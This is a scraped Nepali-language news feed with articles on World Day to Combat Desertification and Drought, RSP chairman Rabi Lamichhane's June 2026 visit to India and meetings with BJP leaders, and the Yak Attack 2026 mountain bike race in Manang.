यो दिवसले खाद्य सुरक्षादेखि वातावरण तथा भू–संरक्षण लगायत विभिन्न मुद्दामा विश्व समुदायमाझ निरन्तर सन्देश प्रवाह गर्दै आएको छ । दिवस मनाउनुको मूल उद्देश्य यो धर्तीलाई जीवित वनस्पति र प्राणी जगतको संरक्षणबाट मानव जगतका लागि बस्न योग्य र सुन्दर बनाउनु हो । तर सुक्खा खडेरीका कारण जमिन मरुभूमिकरण हुने खतरा बढ्दै गएको छ । मरुभूमिकरण तथा खडेरी भनेको वर्षात् नहुनु मात्र होइन जलवायु परिवर्तनको असर र मानव क्रियाकलापबाट जमिनको उर्वरा शक्तिमा ह्रास आउनु पनि हो । उत्पादनशील जमिन क्रमशः अनुत्पादक बन्दै जाने प्रक्रिया नै मरुभूमिकरणको अवस्था हो ।
खडेरी भनेको लामो समयसम्म पर्याप्त वर्षा नपर्नु हो । यद्यपि खडेरी एक स्वाभाविक प्रक्रिया हो, जलवायु परिवर्तनले यसको आवृत्ति, अवधि र तीव्रता बढाइरहेको छ। यसले मरुभूमिकरणको असरलाई अझ गम्भीर बनाउँछ, जसले बाली सुकाउँछ, गाईवस्तु र वनस्पतिलाई मार्छ, र पानीको चरम अभाव निम्त्याउँछ ।
मरुभूमिकरण भन्नाले मरुभूमिको विस्तारलाई जनाउने होइन; यसको अर्थ हो उत्पादन क्षमतायुक्त जमिनको गुणस्तर क्रमशः बिग्रनु, यो वन फडानी, अत्यधिक चरन, अस्थिर कृषि अभ्यास, जलवायु परिवर्तन र प्रभावकारी पानी व्यवस्थापनको कमजोरीका कारण हुन्छ । यसले जमिनलाई बिस्तारै बन्जर बनाउँछ, जसले बाली, वनस्पति र जीवन धान्न सक्दैन । जब माटोको माथिल्लो तह बगेर वा सुक्खा भएर जान्छ, सम्पूर्ण पारिस्थितिक तन्त्र कमजोर हुन्छ र समुदायहरू आफ्नै भूमिबाट विस्थापित हुन बाध्य हुन्छन् ।
खडेरी र जमिन क्षरण रोक्न सबै तहको सहकार्य आवश्यक पर्छ । दिगो भूमिसंरक्षण कार्य गर्ने, वनरोपण र वनसंरक्षण, पानी व्यवस्थापनले खडेरीको असर कम गर्न मद्दत गर्दछ ।
जमिन केवल किसान वा वातावरणकर्मीको मात्र विषय होइन । शहर, पहाड, जङ्गल वा तट क्षेत्र जहाँ भए पनि, हाम्रो जीवन स्वस्थ जमिन, शुद्ध पानी र सन्तुलित पारिस्थितिकी प्रणालीमा निर्भर गर्छ ।
विश्व खडेरी रोकथाम दिवसले हामीलाई सोच्न मात्र होइन, काम गर्न पनि प्रेरित गर्छ । यो हामीले आजका दिनमा भोगिरहेको समस्या हो । यदि हामी सबैले हातेमालो गर्यौं भने जमिनको पुनःस्थापना सम्भव छ र भावी पुस्ताका लागि सुरक्षित वातावरण निर्माण गर्न सकिन्छ ।
संयुक्त राष्ट्रसंघीय मरुभूमिकरणविरुद्धको सन्धि (ग्ल्ऋऋम्) अनुसार, विश्वका १०० भन्दा बढी देशहरू गम्भीर जमिन क्षरणको सामना गरिरहेका छन् । ३.२ अर्बभन्दा बढी मानिसहरू यसबाट प्रभावित छन् र यो संख्या अझै बढ्दो छ । विश्वको करिब ४० प्रतिशत जमिन पहिले नै बिग्रिसकेको छ, जसले खाद्य प्रणाली, अर्थतन्त्र र जनसंख्या प्रवाहमा असर पारिरहेको छ ।
यदि अहिलेको प्रवृत्ति यस्तै रह्यो भने सन् २०५० सम्ममा थप ५ करोड मानिस मरुभूमिकरणका कारण विस्थापित हुन सक्ने अनुमान गरिएको छ ।
उर्वर भूमिको जङ्गल विनाश हुनु, अत्यधिक दोहनका साथ कृषि प्रणाली अपनाइनु र सुक्खा खडेरीले आक्रान्त पारी उक्त भूमि बाँझोमा परिणत हुने कारण नै जमिन मरुभूमिकरण हुने अवस्था हो । जुन विश्वमा बढ्दो पारिस्थितिकीय–वातावरणीय समस्याका रूपमा देखापरेको छ । सुक्खा, खडेरी र मरुभूमिकरणका कारणले मानवतामाथि नै संकट उत्पन्न भएको अर्थमा बुझ्दा यसलाई न्यूनीकरण गर्दै अगाडि बढ्नु आजको आवश्यकता हो । भविष्यका लागि सीमित प्राकृतिक स्रोत साधनको अत्यधिक दोहन हुनबाट बचत गर्नु अहिलेको प्रमुख चुनौती बनेको छ । यो दिवसले त्यो चुनौती बदल्नेतर्फ विश्वलाई उत्प्रेरित गर्न सकोस् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49414 0
‘सरकार ढल्दैन, चुनावअघिको सहमतिमा अडिग छौं’ : रास्वपा सभापति रवि, भारत भ्रमणपछि https://www.antaranganews.com/?p=49192 https://www.antaranganews.com/?p=49192#respond Fri, 05 Jun 2026 14:37:02 +0000 https://www.antaranganews.com/?p=49192 काठमाडौं– झण्डै दुई तिहाइ नजिकको सरकार गठन गरेपछि पहिलोपटक छिमेकी मुलुक भारतको भ्रमण सकेर राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा) का सभापति रवि लामिछाने फर्किनु भएको छ । सभापति रवि लामिछानेले ‘सरकार ढल्दैन, चुनावअघिको सहमतिमा अडिग छौं’ भन्नु भएको छ । भारतको पाँचदिने भ्रमण सकेर फर्किएपछि उहाँले त्रिभुवन विमानस्थलमा पत्रकारहरुसँग कुराकानी गर्दै जेठ २२ गते यस्तो बताउनु भएको हो ।
पाँच दिन लामो भ्रमण गरेका सभापति लामिछाने आजै साँझ स्वदेश फर्किनु भएको हो । प्रतिपक्षी दलहरूले आशीर्वाद लिन जानुभयो भनेर आशंका गरेका छन् । अब तपाईं छिट्टै प्रधानमन्त्री बन्दै हुनुहन्छ रे ? भन्ने सञ्चारकर्मीहरूको प्रश्नमा ‘निर्वाचनअगाडि हामीले लेखेको कागज एकपटक पढ्न आग्रह गर्छु । हामीले बोलेर लेखेर गरेका बाचामा अडिग छौँ । प्रतिपक्ष साथीहरूलाई आग्रह गर्न चाहन्छु । जुन कुरा स्पष्ट पारिसकेका छौँ । त्यस कुरापछि लाग्न जरुरत छैन । हामी अस्थिरताको पक्षमा छैनौँ । जे सुधार्नुपर्नेछ । सुधार्दै लैजानेछौँ । यसैबाट संसारै ढल्छ जसरी न्वाइज नगर्दा हुन्छ ।’
उहाँले आफ्नो पार्टीलाई जनताले स्थिरताका लागि मतदान गरेको भन्दै उक्त सहमतिमा अडिग रहेको दोहोर्याउनु् भयो । उहाँले थप भन्नुभयो, ‘हामीलाई गरेको वाचाप्रति अडिग छौं । रहिरन्छौं ।’
नेपाल–भारत सम्बन्ध ‘रिसेट’ भएको छ :
सभापति लामिछानेले यो भ्रमणबाट नेपाल–भारत सम्बन्ध ‘रिसेट’ भएको र सीमा विवाद कूटनीतिक माध्यमबाट समाधान गर्नुपर्ने बताउनु भएको छ । उहाँले नयाँ सरकार बनेपछि भएको यो भ्रमणबाट आफूले कुन कुन विषयलाई प्राथमिकीकरण गर्न सक्छौं भनेर कुराकानी अघि बढाएको जानकारी दिनु भयो ।
‘नयाँ सरकार बनिसकेपछि मित्र राष्ट्रसँग हामीले के अपेक्षा गर्ने, लगानीका कुरामा, सहकार्यका कुरामा, हाम्रो वर्षौदेखि रहेको सद्भावपूर्ण सम्बन्धका आधारमा राष्ट्रका रुपमा कुन लाभलाई लिन सक्छौं,’ भ्रमणबाट फर्किएपछि सञ्चारकर्मीसँग उहाँले भन्नुभयो, ‘कुन विषयलाई प्राथमिकीकरण गर्न सक्छौं भनेर कुराकानी अघि बढेको छ । एउटा राजनीतिक दल र अर्को राजनीतिक दलको निमन्त्रणमा भएका विषय भएकाले हामी एउटा चरणमा प्रवेश गरेका छौं ।’
उहाँले आफ्नो भ्रमणमा कुनै अस्पष्ट र लुकिछिपी नभएको समेत उल्लेख गर्नुभयो । उहाँले थप भन्नुभयो, ‘अस्पष्ट, लुकिछिपी, अपारदर्शी सम्बन्ध होइन, पारदर्शी, स्पष्ट र कहाँ जाने भन्ने कुराको गन्तव्य तय गरेर हिंड्न सुरु गरिएको विषय भएकाले, यो एक हिसाबले रिसेट जस्तो पनि हो, रिसेट गर्ने काममा यो भ्रमणले मदत गर्छ भन्ने आशा गरेको छु ।’
सिमानाको विषयमा कुरा राख्न बिर्सनुभएको हो ? :
सिमानाको विषयमा कुरा राख्न बिर्सनुभएको हो ? भन्ने पत्रकारका प्रश्नमा सभापति रविले मिचिएको सिमानाको बारेमा प्रतिक्रिया दिदै भन्नुभयो, ‘कूटनीतिको माध्यमबाट डिप्लोम्याटिक च्यानललाई गर्नुपर्ने हुन्छ । कूटनीतिक एक्टिभिस्टको रूपमा उठाउने विषय होला । चरणबद्ध रूपमा कूटनीतिका रूपमा पहिलेका सरकारले पनि सुरु गरेका थिए । अहिले पनि सुरु भएको छ । त्यस ढंगले कुरा अगाडिको छ । समस्या समाधानका लागि फरक–फरक च्यानलबाट समाधान गर्ने कुरा भयो ।’
हामीलाई गरिएको स्वागत देशको सम्मान हो :
सभापति रवि लामिछानेले भारत भ्रमणका क्रममा गरिएको स्वागतलाई देशकै सम्मानको रूपमा हेर्नुपर्ने बताउनु भएको छ ।
‘हामीलाई भारतमा गरिएको सम्मान देशको सम्मान हो । देशलाई गरिएको स्वागत हो । हाम्रो स्वागतको पनि कुरा निकाल्न थालियो भने के अर्थ होला र ?,’ उहाँले प्रतिप्रश्न गर्नुभयो ।
भारतमा को–कोसँग भेट भयो ?
सभापति रविले भारत बसाइको क्रममा भारतीय प्रधानमन्त्री नरेन्द्र मोदी, विदेशमन्त्री एस जयशंकर, गृहमन्त्री अमित शाह, भाजपा अध्यक्ष नितिन नवीन लगायतसँग भेटवार्ता गर्नु भएको थियो । सो क्रममा उहाँले अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पका दक्षिण तथा मध्य एसियाली विशेष दूत सर्जियो गोरसँग पनि भारतमै भेटवार्ता गर्नु भएको छ ।
भारतको सत्तारुढ भारतीय जनता पार्टी (भाजपा) का अध्यक्ष नितिन नवीनको निमन्त्रणामा सभापति लामिछाने जेठ १८ गते भारत भ्रमणमा जानु भएको हो ।
रवि नेतृत्वको भ्रमण टोलीमा रास्वपा सहमहामन्त्री तथा प्रतिनिधि सभा सदस्य विपिनकुमार आचार्य, सचिवालय सदस्य तथा प्रतिनिधि सभा सदस्य दीपक बोहोरा, पत्नी निकिता पौडेल र प्रदीप आचार्य हुनुहुन्थ्यो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49192 0
रास्वपा सभापति रविलाई भाजपा पार्टी कार्यालयमा बाजागाजा, पुष्पवर्षा, रेड कार्पेटसहित भव्य स्वागत https://www.antaranganews.com/?p=49152 https://www.antaranganews.com/?p=49152#respond Tue, 02 Jun 2026 08:00:14 +0000 https://www.antaranganews.com/?p=49152 नयाँदिल्ली– सत्तारुढ दल राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)का सभापति रविलाई भाजपाले पुष्पवर्षा, रेड कार्पेटसहित भव्य स्वागत गरेको छ । उहाँको भारतीय जनता पार्टीको मुख्यालयमा जेठ १९ गते स्वागत गरिएको हो ।
भारतीय जनता पार्टीको निमन्त्रणामा दिल्ली पुगेका लामिछानेलाई भाजपा कार्यालयमा परम्परागत झाँकी र फूलमालासहित भव्य स्वागत गरिएको छ । पार्टी मुख्यालयमा उहाँलाई पार्टीका अध्यक्ष नितिन नवीन लगायतका पदाधिकारीले स्वागत गरेका हुन् । मुख्यालयको अवलोकन गरेपछि भाजपाका अध्यक्ष नितिनसँग दुई पक्षीय भेटवार्ता हुनुको साथै अन्य पदाधिकारीसँग पनि भेटघाट भएको छ ।
स्वागतपछि रास्वपाका सभापति रवि लामिछाने र भारतीय जनता पार्टी (भाजपा)का अध्यक्ष नीतिन नविनबीच भेटवार्ता भएको छ । भारतीय जनता पार्टी (भाजपा)को कार्यालयमा रास्वपाका सभापति रवि लामिछाने र भारतीय जनता पार्टी (भाजपा)का अध्यक्ष नीतिन नविनबीच भेटवार्ता भएको हो ।
भाजपाको ं‘भाजपालाई जान्नुहोस्’ अभियान अन्तर्गत भएको यस भेटवार्ताको मुख्य उद्देश्य दुई पार्टीबीच सम्बन्ध सुरुवात गर्नु र सीमापार राजनीतिक समझदारी मजबुत बनाउनु हो भनिएको छ । यो विशेष अभियानको सुरुवात भाजपाका पूर्व अध्यक्ष जेपी नड्डाले सन् २०२३ मा पार्टीको ४३ औँ स्थापना दिवसका अवसरमा गरेका थिए । यसअघि गत शनिबार मात्र भाजपाका राष्ट्रिय अध्यक्ष नितिन नवीनले पार्टीको आन्तरिक गौरवबारे चर्चा गर्दै भारतीय जनता पार्टीको यात्रा केवल एउटा राजनीतिक दलको विस्तारको कथा मात्र नभई यो राष्ट्रवाद, सांस्कृतिक चेतना, सेवा, सङ्घर्ष र समाजको अन्तिम व्यक्तिसम्म विकास पु¥याउने सङ्कल्पको ऐतिहासिक यात्रा भएको बताए । रास्वपा सभापति लामिछानेको यो भ्रमणले नेपाल र भारतका प्रमुख दलहरूबिचको सम्बन्धमा नयाँ आयाम थपिने अनुमान गरिएको छ ।
भेटमा दुई नेताबीच दलीय संगठनात्मक अभ्यास, लोकतान्त्रिक प्रक्रिया र जनता केन्द्रित राजनीतिक पहुँचका विषयमा विचार आदानप्रदान भएको छ । भारतीय जनता पार्टीले नेपाली प्रतिनिधिमण्डललाई मुख्यालयमा न्यानो स्वागत गर्दै यो भ्रमणबाट दुई पार्टीबीच रचनात्मक संवाद स्थापित हुने अपेक्षा राखेको बताएको छ ।
भेटवार्ता दुई देशका लोकतान्त्रिक शक्ति, दलगत अनुभव, राजनीतिक सहकार्य र आपसी सम्बन्ध सुदृढीकरणका विषयमा छलफल भएको रास्वपाले जनाएको छ ।
आजै भाजपाको मुख्यालयले रविको नाममा रात्रिभोजको आयोजना गर्ने बताइएको छ ।
सभापति रविले नयाँ दिल्लीमा उच्चस्तरीय राजनीतिक तथा कूटनीतिक भेटवार्ता गर्ने कार्यक्रम छ । भोलि जेठ २० गते भारतीय प्रधानमन्त्री नरेन्द्र मोदीसँग भेट गर्ने कार्यक्रम छ । लामिछानेले भारतमा रहेका नेपालीसँग पनि साक्षात्कार गर्ने कार्यक्रम छ ।
पाँचदिने भारत भ्रमणमा रहनु भएका सभापति रविले भाजपाका नेता नीतिन नविनसँग भेटघाट गरी भाजपा कार्यालयको संरचनाबारे जानकारी लिनु भएको छ ।

सभापति लामिछाने नेतृत्वको प्रतिनिधिमण्डलमा सहमहामन्त्री विपिन कुमार आचार्य, सचिवालय सदस्य दीपक बोहोरा, श्रीमती निकिता पौडेल र प्रदीप आचार्य सहभागी हुनुहुन्छ ।
सभापति रवि नेतृत्वको टोली ५ दिने भ्रमण सकेर उहाँहरू जेठ २२ गते फर्कने कार्यक्रम छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49152 0
रास्वपा सभापति रविको स्वागतमा भाजपाले राख्यो होर्डिङबोर्ड  https://www.antaranganews.com/?p=49149 https://www.antaranganews.com/?p=49149#respond Tue, 02 Jun 2026 03:38:21 +0000 https://www.antaranganews.com/?p=49149 काठमाडौं– रास्वपा सभापति रवि लामिछाने पाँच दिने भ्रमणका लागि भारत पुग्नु भएको छ । उहाँ हिजो जेठ १८ गते दिउँसो नयाँदिल्ली पुग्नु भएको हो । उहाँको स्वागतमा भाजपाले होर्डिङबोर्ड राखेको छ । यस्तो प्रचलन भारतमा यसअघि अन्य शीर्ष तहका नेताहरू जाँदा पनि हुने गथ्र्यो ।
भाजपाकै निमन्त्रणमा भारत पुग्नु भएका सभापति लामिछानेको स्वागतमा नयाँ दिल्लीका विभिन्न स्थानमा सभापति लामिछानेको तस्वीर अंकित होर्डिङबोर्ड राखिएको छ ।
दिल्ली विमानस्थलमा भारतीय जनता पार्टी (भाजपा) का महासचिव अरुण सिंह र विदेश विभाग प्रमुख विजय चौथाइवालेले सभापति लामिछानेसहितको भ्रमण टोलीलाई स्वागत गरेका थिए ।
भ्रमणदलमै रहेका सांसद बोहोराले एक भिडियो पोस्ट गर्दै ‘दिल्लीतिर यस्तो छ’ भनेर क्याप्सन राख्नु भएको छ ।
सभापति रविले जेठ १८ देखि २२ गते (जुन १ देखि ५ तारिख) सम्म भारत भ्रमणमा हुनुहुन्छ रास्वपा प्रवक्ता मनिष झाले बताउनु भयो । उहाँका अनुसार त्यसक्रममा नयाँदिल्लीमा उच्चस्तरीय राजनीतिक तथा कूटनीतिक भेटवार्ता गर्ने कार्यक्रम रहेको छ ।
उनले भाजपा नेतृत्व, भारतमा रहेका नेपाली समुदाय र पार्टीका शुभेच्छुकहरूसँग भेटघाट गर्ने कार्यक्रम छ । त्यसपछि उनले अयोध्याको भ्रमण पनि गर्ने पार्टी प्रवक्ता झाले जारी गरेको विज्ञप्तिमा उल्लेख छ ।
भेटघाट, छलफल तथा भ्रमणका लागि नयाँदिल्लीस्थित नेपाली दूतावासले समन्वय गरिरहेको रास्वपाले जनाएको छ ।
सभापति लामिछानेसँगै सो भ्रमणदलमा रास्वपाका सहमहामन्त्री तथा प्रतिनिधि सभा सदस्य विपिनकुमार आचार्य, सचिवालय सदस्य तथा प्रतिनिधि सभा सदस्य दीपक बोहोरा, पत्नी निकिता पौडेल र प्रदीप आचार्य समेत हुनुहुन्छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49149 0
रास्वपा सभापति रवि लामिछानेलाई दिल्लीमा भाजपाका राष्ट्रिय महासचिव अरुण सिंह तथा विदेश विभाग प्रमुख विजय चौथाइवाद्वारा स्वागत https://www.antaranganews.com/?p=49139 https://www.antaranganews.com/?p=49139#respond Mon, 01 Jun 2026 14:35:27 +0000 https://www.antaranganews.com/?p=49139 काठमाडौँ– राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का सभापति रवि लामिछाने दिल्लीको पाँच दिने भ्रमणमा आज प्रस्थान गर्नु भएको छ । रास्वपा प्रतिनिधि मण्डलको नेतृत्व गर्दै उहाँ नयाँ दिल्ली पुग्नु हुँदा दिल्ली विमानस्थलमा भाजपाका राष्ट्रिय महासचिव अरुण सिंह तथा विदेश विभाग प्रमुख विजय चौथाइवाले जेठ १८ गते स्वागत गरेका छन् ।
सभापति रविको टोली भाजपाको निमन्त्रणामा भारत गएको हो । उहाँ भोलि बिहान ११ बजे भाजपाको मुख्यालय जानु हुनेछ । त्यहाँ उहाँलाई पार्टीको तर्फबाट स्वागत गर्ने कार्यक्रम रहेको छ । भाजपाको कार्यालयमा भाजपाका अध्यक्ष नितिन नविनसँग भेटघाट हुनुको साथै पार्टीका अन्य उच्च अधिकारीसँग छलफल हुने बताइएको छ ।
भाजपाकै मुख्यालयमा भारतीय विदेश मन्त्री एस.जयशंकर र सभापति लामिछानेबिच पनि भेटवार्ता हुने बताइएको छ ।
सोही दिन भाजपाले सभापति लामिछानेका लागि रात्रीभोजको आयोजना गरेको छ । सो रात्री भोजमा भारतका उच्च पदस्थ व्यक्तिहरूको सहभागिता रहने बताइएको छ ।
भारतमा रहेको अन्तर्राष्ट्रिय नेपाली मञ्चले जेठ २१ अभिनन्दन कार्यक्रमको आयोजना गरेको छ । सो कार्यक्रममा दिल्लीमा रहेका नेपालीहरू सहभागी हुने बताइएको छ ।
सभापति रविले नयाँदिल्लीमा उच्चस्तरीय राजनीतिक तथा कूटनीतिक भेटघाट गर्ने कार्यतालिका छ । त्यस्तै, भाजपा शीर्ष नेतृत्वसँग छलफल गर्नुका साथै भारतमा बसोबास गरिरहेका नेपाली समुदाय र पार्टीका शुभेच्छुकहरूसँग भेटघाट गर्ने कार्यक्रम छ ।
यसबीच व्यक्तिगत भ्रमणमा अयोध्या जाने कार्यक्रम समेत रहेको छ ।
नयाँदिल्लीस्थित नेपाली दूतावासले लामिछानेका उच्चस्तरीय कार्यक्रमहरू सम्पन्न गर्न समन्वयात्मक रूपमा सहयोग गरिरहेको पनि जनाइएको छ ।
भारतीय प्रधानमन्त्रीसँग जेठ २० गते भेटवार्ताको कार्यतालिका :
रास्वपाका सभापति रवि लामिछानेले जेठ २० गते भारतीय प्रधानमन्त्री नरेन्द्र मोदीलाई भेट्ने कार्यक्रम तय भएको छ । रविले भाजपाका अध्यक्ष नितिन नवीन, भारतीय विदेश मन्त्री एस. जयशंकर र राष्ट्रिय सुरक्षा सल्लाहकार अजित डोभाल लगायत उच्च अधिकारीहरूसँग पनि भेटवार्ता गर्ने कार्यक्रम छ ।
भेटघाटका क्रममा अयोध्याको राम मन्दिर दर्शन र अन्तर्राष्ट्रिय नेपाली मञ्चद्वारा आयोजना गरिने अभिनन्दन कार्यक्रममा समेत सभापति रविको टोलीले भाग लिने छ ।
उहाँ दिल्ली प्रस्थान गर्नु अघि रास्वपाका सभापति रवि लामिछाने भारत भ्रमण सचिवालय बैठकले स्वीकृत गरेको थियो । आजै बिहान बसेको भर्चुअल बैठकले सभापति लामिछानेको भारत भ्रमण स्वीकृत गरेको हो ।
सभापति लामिछाने नेतृत्वको प्रतिनिधिमण्डलमा सहमहामन्त्री विपिन कुमार आचार्य, सचिवालय सदस्य दीपक बोहोरा, श्रीमती निकिता पौडेल र प्रदीप आचार्य समावेश हुने कोषाध्यक्ष लिमा अधिकारीले जानकारी दिइन् ।
स्मणीय छ, आम निर्वाचनपछि रास्वपा नेतृत्वको सरकार गठन भएयता सत्तारुढ दलका शीर्ष नेताको यो पहिलो औपचारिक वैदेशिक भ्रमण हो ।
यो भ्रमणलाई नयाँ सरकार गठनपछि नेपाल–भारत सम्बन्धलाई थप सुदृढ बनाउने प्रयासका रूपमा समेत विश्लेषण गरिएको छ ।
भारत प्रस्थान गर्ने क्रममा त्रिभुवन विमानस्थलमा पत्रकारहरूले सोधेको प्रश्नमा सभापति लामिछानेले फर्किएपछि कुराकानी गर्ने बताउनु भएको छ । उहाँले भन्नुभयो, ‘फर्किएपछि सबै साथीहरूसँग कुरा गर्छु, प्रेससँग कुरा गर्छु ।’
सभापति रवि नेतृत्वको टोली ५ दिने भ्रमण सकेर उहाँहरू जेठ २२ गते फर्कने कार्यक्रम छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49139 0
याक अट्याक २०२६ को टोली आज मनाङमा विश्रमा गर्दै https://www.antaranganews.com/?p=49032 https://www.antaranganews.com/?p=49032#respond Wed, 27 May 2026 13:36:42 +0000 https://www.antaranganews.com/?p=49032 चामे(मनाङ)– ‘याक अट्याक– २०२६’को प्रतिस्पर्धामा सहभागी भएको टोली आज चौथो दिन जेठ १३ गते माथिल्लो मनाङमा पुगेर विश्राम गरिहरेको छ । सो प्रतियोगिताको माउन्टेन बाइकिङ वल्र्ड वाइड प्रालि नेपालले व्यवस्थापन गरेको हो ।
लमजुङको जिल्ला सदरमुकाम बेसीशहरबाट चक्रीय अन्नपूर्ण पदमार्गमा सो प्रतिस्पर्धा सुरु भएको हो । यो ‘याक अट्याक’को १८औं संस्करण हो । नेपाललाई अन्तर्राष्ट्रिय साहसिक पर्यटनको गन्तव्यका रूपमा स्थापित गर्ने उद्देश्यले सो प्रतियोगिता माउन्टेन बाइकिङ वल्र्ड वाइड लिमिटेड बेलायतको आयोजनामा भएको हो ।
विश्वकै कठिन र उच्च क्षेत्रमा आयोजना हुने सो प्रतियोगिता माउन्टेन बाइक रेसमध्ये चर्चित मानिन्छ । उक्त प्रतियोगितामा ११ देशका २८ जना साइकल धावक सहभागी भएको आयोजकको भनाइ छ । प्रतियोगितामा २१ विदेशी र ७ नेपाली साइकल धावक सहभागी छन् ।
प्रतियोगिताको पहिलो दिन लमजुङको बेसीशहर नगरपालिका– ८ बाट सुरु भई सोही पालिका– ६ को पुमागाउँ, क्ब्होलासोथर गाउँपालिका– १ को बाग्लुङपानी– नजरे हुँदै बेसीशहर नगरपालिका– ६ को चण्डीस्थान, मकैडाँडा झरेर पुनः बेसीशहर नगरपालिका– ८ को बेसीशहरसम्म करिब ३० किलोमिटर दूरी पार गरेका छन् ।
सो टोली दोस्रो दिन यहाँ अर्थात मनाङ जिल्लाको सदरमुकाम चामेमा आइपुगेको थियो । तेस्रो दिनमा माथिल्लो मनाङ पुगेको सो टोली त्यहाँ आराम गरिरहेको छ ।
उक्त बहुदिवसीय प्रतियोगितामा सहभागी विदेशी धावकमध्ये भारतका ५ पुरुष खेलाडी छन् । प्रतियोगितामा ६० वर्षमाथिका २ जना विदेशी छन् । सो प्रतिस्पर्धामा विदेशी महिला ३ जना र नेपाली महिला खेलाडी एक जना छन् । ती सहभागीहरू भारत, आयरल्यान्ड, जर्मनी, बेलायत, अस्ट्रिया, ब्राजिल, स्विडेन, इजरायल र स्पेनबाट आएको प्रतियोगिता व्यवस्थापक अजय पण्डित क्षेत्रीले बताउनु भयो । उहाँका अनुसार प्रतियोगितामा गत वर्षका विजेता खुसीमान घर्तीमगर तथा धुलिखेल अस्पतालका डाक्टर विकास पराजुलीले पनि भाग लिनु भएको छ । उहाँले भन्नुभयो, ‘हामीहरूको टोली चक्रीय पदमार्ग हुँदै हिमाली जिल्ला मनाङमा भोलिसम्म रहने छ ।’ निर्धारित कार्यक्रम अनुसार भोलि थोराङ फेदीमा बास बस्ने उहाँको भनाइ छ ।
पाँचौं दिन थोराङ्ला फेदी हुँदै छैटौं दिन विश्वकै अग्लो हिमाली भञ्ज्याङमध्ये एक मानिने ५ हजार ४ सय १६ मिटर उचाइको थोराङ्ला पार गरेर मुस्ताङको कागबेनी झर्ने योजना रहेको प्रतियोगिता व्यवस्थापक पण्डित क्षेत्रीले जानकारी दिनु भयो । उहाँका अनुसार सातौं दिन कालोपानीमा पुगेर प्रतियोगिता सकिनेछ ।
समापन कार्यक्रम मे ३१ (जेठ १७ गते) का दिन पोखरामा आयोजना गरिने रेक ओ–अर्डिनेटर ज्ञानेन्द्र स्थापितले उल्लेख गर्नु भयो । उहाँले भन्नुभयो, ‘प्रतियोगितामा पुरुष तथा महिलातर्फ प्रथम हुनेले ७५ हजार, द्वितीयले ५० हजार र तृतीयले २० हजार रुपैयाँ पुरस्कार प्रदान गर्ने कार्यक्रम रहेको छ ।’

]]>
https://www.antaranganews.com/?feed=rss2&p=49032 0